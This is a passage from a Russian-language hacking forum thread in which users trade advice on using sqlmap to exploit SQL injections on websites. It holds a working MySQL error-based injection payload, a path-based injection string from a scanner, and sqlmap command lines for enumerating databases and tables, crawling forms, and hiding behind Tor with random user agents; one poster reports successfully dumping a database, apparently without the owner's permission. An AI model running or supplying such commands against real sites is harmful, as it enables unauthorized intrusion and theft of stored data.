HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #141  
Старый 04.03.2016, 07:58
Грабитель
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
Провел на форуме:
69791

Репутация: -7
По умолчанию

Возможно ли в Sqlmap сразу задать для целевого сайта готовый payload? Почитав руководство, ничего по этому поводу не нашёл, а было бы неплохо запустить сразу с параметром нужного пайлоада и сразу же приступить к раскрутке, и не ждать несколько часов, пока он его будет перебирать.
 
Ответить с цитированием

  #142  
Старый 04.03.2016, 10:30
Waki
Познающий
Регистрация: 09.10.2015
Сообщений: 54
Провел на форуме:
19071

Репутация: 10
По умолчанию

Цитата:
Сообщение от Грабитель  

Возможно ли в Sqlmap сразу задать для целевого сайта готовый payload? Почитав руководство, ничего по этому поводу не нашёл, а было бы неплохо запустить сразу с параметром нужного пайлоада и сразу же приступить к раскрутке, и не ждать несколько часов, пока он его будет перебирать.
можно указать какую базу использовать (--dbms), и тип уязвимости (--technique)

работу по готовому пайлоду не находил
 
Ответить с цитированием

  #143  
Старый 04.03.2016, 10:54
Грабитель
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
Провел на форуме:
69791

Репутация: -7
По умолчанию

Цитата:
Сообщение от Waki  

можно указать какую базу использовать (--dbms), и тип уязвимости (--technique)
работу по готовому пайлоду не находил
К сожалению, не то. Есть однотипные SQL иньекции в одном движке, но чтобы каждый URL засунуть в sqlmap, приходится ждать по нескольку часов пока он подберет под него тот же самый payload.

Пока что использую подмену url в sqlite файле для конкретного сайта в sqlmap, и думал может быть есть способ менее геморный... но видимо нету.

Ещё вопрос, столкнулся с непонятной вещью, когда из таблицы не получается извлечь никаких данных.

Вытаскиваю все базы данных, успешно вытаскиваются. Дальше вытаскиваю таблицы для конкретной базы данных, они тоже прекрасно вытаскиваются.

Но если я пытаюсь получить хоть какую то информацию из таблицы, то sqlmap не может ничего получить.

Банальный запрос --sql-query="select count(*) from my_database._my_table" и выдаёт ошибку:

Код:
[10:51:05] [INFO] retrieved:
[10:51:09] [WARNING] reflective value(s) found and filtering out
[10:51:24] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:52:30] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[10:52:34] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions

select count(*) from my_database._my_table: None
При этом все остальные запросы по типу select version() и так далее выполняются нормально, а при попытке получить информацию из таблицы или хотя бы количество записей, вот такая ошибка выскакивает.
 
Ответить с цитированием

  #144  
Старый 05.03.2016, 02:32
Грабитель
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
Провел на форуме:
69791

Репутация: -7
По умолчанию

Хмм, серьёзно, интересно. Запрос "select version()" выполняется нормально и выводит версию, а такой запрос: "select version() from information_schema.tables" возвращает none

На многих сайтах. И count(*) from base.table не срабатывает, так же выплёвывает или none или ошибки, если кто поможет, буду безумно рад.
 
Ответить с цитированием

  #145  
Старый 05.03.2016, 04:15
demontager
Новичок
Регистрация: 23.07.2009
Сообщений: 25
Провел на форуме:
92307

Репутация: 0
По умолчанию

После скана сайта на уязвимость, выдало такую инфу.

Код:
sqlmap identified the following injection point(s) with a total of 275 HTTP(s) requests:
---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: mailFlag=newsletter&email=QWln' AND (SELECT 5736 FROM(SELECT COUNT(*),CONCAT(0x716a717a71,(SELECT (ELT(5736=5736,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Jdzw'='Jdzw
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
и в target.txt такое

Код:
https://www.site.com/index.php?option=sentMail (POST)

mailFlag=newsletter&email=QWln
Как дальше раскручивать чтобы получить таблицы ? Интересует сам запрос sqlmap.py -u "" и что указывать.
 
Ответить с цитированием

  #146  
Старый 05.03.2016, 10:16
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062

Репутация: 231


По умолчанию

Код:
-u "https://www.site.com/index.php?option=sentMail" --data="mailFlag=newsletter&email=1*" --dbs --tables
 
Ответить с цитированием

  #147  
Старый 05.03.2016, 10:20
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062

Репутация: 231


По умолчанию

Цитата:
Сообщение от .Light.  

Как раскрутить такую скулю?
site.ru/v2-live-with-a-5-1-win/
Acunetix:
Path Fragment (suffix /) input
-
was set to
success' AND 3*2*1=6 AND '000CDY9'='000CDY9
site.ru/v2-live-with-a-5-1-win'%20AND%203*2*1%3d6%20AND%20'000SgxW'%3d'000Sgx W/
Код:
-u "site.ru/v2-live-with-a-5-1-win*" --dbs
 
Ответить с цитированием

  #148  
Старый 06.03.2016, 00:17
demontager
Новичок
Регистрация: 23.07.2009
Сообщений: 25
Провел на форуме:
92307

Репутация: 0
По умолчанию

Цитата:
Сообщение от grimnir  

Код:
-u "https://www.site.com/index.php?option=sentMail" --data="mailFlag=newsletter&email=1*" --dbs --tables
Почему вместо

Код:
mailFlag=newsletter&email=QWln
подставляется в POST

Код:
mailFlag=newsletter&email=1*
p.s. Базу сдампить вышло.
 
Ответить с цитированием

  #149  
Старый 06.03.2016, 00:54
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от demontager  

Почему вместо
Код:
mailFlag=newsletter&email=QWln
подставляется в POST
Код:
mailFlag=newsletter&email=1*
p.s. Базу сдампить вышло.
Code:

mailFlag=newsletter&email=QWln

подставляется в POST

Code:

mailFlag=newsletter&email=1*

можно так

mailFlag=newsletter&email=*
 
Ответить с цитированием

  #150  
Старый 06.03.2016, 04:52
demontager
Новичок
Регистрация: 23.07.2009
Сообщений: 25
Провел на форуме:
92307

Репутация: 0
По умолчанию

А как можно искать уязвимости GET запросами ? Если в качестве цели указывать корневой URL. Допустим, если POST запросы, то я так делаю

Код:
sqlmap.py -u "site.com" --forms --crawl=3 --random-agent --tor --batch
И он сам уже ищет все доступные формы и пробует их на уязвимость.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.